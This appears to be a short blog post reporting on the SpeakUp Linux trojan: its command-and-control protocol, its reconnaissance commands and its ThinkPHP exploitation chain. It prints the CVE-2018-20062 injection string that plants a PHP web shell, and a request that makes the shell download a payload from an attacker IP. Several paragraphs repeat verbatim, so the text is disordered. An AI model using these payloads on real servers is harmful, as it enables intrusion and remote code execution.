SpeakUP, A Linux Trojan Malware found!!!
Hello and welcome to the Dark Street Hackers. First of all thank you all for your huge support. Now I am here with the latest news about malware. Lets see what it is.
It affects directly on Linux Server. And also AWS host machines as well as MAC devices.
When device registers, the trojan contacts C&C for commands. C&C responses in many ways, it can respond as a “newtask” that includes downloading and executing any file from the remote server. Second as a “notask” to put the Trojan to sleep for 3 seconds as well “newerconfig” to update the miner config file. SpeakUp backdoor scans and infects vulnerable Linux servers by brute-forcing passwords to access admin panels, scanning for the availability of specific ports, and exploiting known RCE (Remote Command Execution) vulnerabilities.
In the first step, using the POST method packet sends a victim ID and information such as the current version of the installed script. The first C&C response is “needrgr” which means the infected victim is new to the server and needs registration.
Then the Trojan posts “full information” about the machine by executing the following LINUX commands:-
Recently, Researchers found a Trojan that creates a Linux Backdoor in six different Linux Distribution. The name is SpeakUp.
It affects directly on Linux Server. And also AWS host machines as well as MAC devices.
This malware begins by exploiting Think PHP vulnerability. About Think PHP vulnerability, this backdoor was found in December 2018. It affected more than 45000 websites. While the developers released a patch for this but it was still being actively exploited in the world before the patch was applied. It uploads a PHP shell that launches a Perl backdoor script. When execution is done, Perl script follows a file deletion process to remove any piece of evidence which includes an infection process. During the infection process, the first stage is to make victim’s device get registered with the C&C for the next stage of payload. According to checkpoint research, the attackers have encoded the backdoor and the C&C communication with salted base64 to avoid detection.
SpeakUp uses POST and GET requests over HTTP to communicate with C&C. It is a compromised website of speakupomaha[.]com.
In the first step, using the POST method packet sends a victim ID and information such as the current version of the installed script. The first C&C response is “needrgr” which means the infected victim is new to the server and needs registration.
Then the Trojan posts “full information” about the machine by executing the following LINUX commands:-
1) Uname (-r, -v, -m, -n,-a, -s)
2) Whoami
3) Ifconfig –a
4) Arp –a
5) cat /proc/cpuinfo | grep -c “cpu family”
6) who –b
The exploitation process is described as below.
1) Using GET request the RCE(Remote Command Execution) vulnerability in ThinkPHP (CVE-2018-20062) is sent to the targeted server.
s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<? php $action = $_GET[‘module’];system($action);? ^>>index.php
2) An HTTP request is sent to the targeted server.
/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc
3) An additional HTTP request is issued which executes perl script to put it in sleep for three seconds and deletes the file of the evidence.
When exploitation gets successful it leads to the deployment of ibus script on the target server.While checkPoint found zettabit, a user on HackForums linked with Zettabit malware. An author behind this campaign.
So this is it!!! stay tuned for more and different updates. Until then bye.
0 Comments